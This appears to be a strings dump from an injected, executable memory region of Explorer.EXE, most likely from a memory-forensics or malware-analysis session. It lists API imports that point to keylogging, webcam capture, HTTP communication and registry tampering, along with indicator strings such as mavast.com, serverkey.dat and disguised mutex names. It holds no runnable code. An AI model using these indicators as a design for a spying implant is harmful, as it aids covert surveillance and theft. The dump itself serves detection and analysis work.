SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
5`6C6Q6}6
5`6C6Q6}6
55
55
;";,;6;
;";,;6;
6&7-737
6&7-737
3"33393>3}3
3"33393>3}3
;#;);/;=;
;#;);/;=;
=}=
=}=
:(:-:8:=:
:(:-:8:=:
7#7)7/7=7
7#7)7/7=7
9&9,929@9
9&9,929@9
0!02090>0
0!02090>0
>$>*>4>9>
>$>*>4>9>
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
dntdll.dll
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
HighMemoryEvent_x
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
.Prev
.Prev
.current
.current
Explorer.EXE_1572_rwx_02060000_000B8000: